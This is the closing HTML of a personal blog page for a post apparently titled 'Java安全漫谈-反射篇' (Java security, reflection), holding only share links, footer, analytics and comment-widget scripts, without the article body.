  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&is_video=false&description=Java安全漫谈-反射篇"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Java安全漫谈-反射篇&body=Check out this article: https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&title=Java安全漫谈-反射篇"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&title=Java安全漫谈-反射篇"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&title=Java安全漫谈-反射篇"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&title=Java安全漫谈-反射篇"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&name=Java安全漫谈-反射篇&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&t=Java安全漫谈-反射篇"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2017-2023
    M1r0ku
  </div>
  <div class="footer-right">
    <nav>
    <!--
      <ul>
        
          <li><a href="/">Home</a></li>
       
          <li><a href="/lists/">Lists</a></li>
       
          <li><a href="/links/">Links</a></li>
       
          <li><a href="/search/">Search</a></li>
       
      </ul>
    -->
      
      <!-- 不蒜子统计 -->
        <ul>
          
          <span id="busuanzi_container_site_pv">
            <i class="fa fa-eye"></i> <span id="busuanzi_value_site_pv"></span>
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
            <i class="fa fa-user"></i> <span id="busuanzi_value_site_uv"></span> 
          </span>
          <script async src="//cdn.bootcdn.net/ajax/libs/busuanzi/2.3.0/bsz.pure.mini.js"></script>
          
      </ul>
      
    </nav>
    
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

  <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?864b0988af87a8a8f5f115cd29c265de";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
        </script>

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'M1r0ku/m1r0ku.github.io';
      var utterances_issue_term = 'title';
      var utterances_label = 'Comment';
      var utterances_theme = 'photon-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>


<!-- FancyBox -->

  <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@4.0/dist/fancybox.umd.js"></script>

<!-- hexo injector body_end start --><script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js" crossorigin="anonymous"></script><link rel="stylesheet" href="/css/customize.css"><!-- hexo injector body_end end --></body>
</html>
